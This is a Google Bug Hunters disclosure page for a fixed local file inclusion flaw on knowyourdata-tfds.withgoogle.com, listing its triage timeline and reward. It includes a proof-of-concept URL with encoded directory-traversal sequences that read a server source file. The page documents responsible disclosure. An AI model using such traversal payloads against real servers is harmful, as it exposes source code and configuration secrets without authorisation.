Skip to Content (Press Enter)
Google
Bug Hunters
LFI in knowyourdata-tfds.withgoogle.com
Reported by:
Ritik Singh
Google VRP
triaged
20:50 | Apr 12, 2024
accepted
15:11 | Apr 15, 2024
fixed
05:43 | Jun 14, 2024
reward decided
$1,337
Summary:
LFI in knowyourdata-tfds.withgoogle.com
Product:
knowyourdata-tfds.withgoogle.com
URL:
https://knowyourdata-tfds.withgoogle.com/assets/onboarding/
Vulnerability type:
File Inclusion
Details
LFI in knowyourdata-tfds.withgoogle.com
POC:-
https://knowyourdata-tfds.withgoogle.com/assets/onboarding//..%2f..%2f..%2f..%2f..%2f..%2f__init__.py
Attack scenario
An attacker could read local files on the web server that they would normally not have access to, such as the application source code or configuration files containing sensitive information on how the website is configured.
登录
使用 Google 账号登录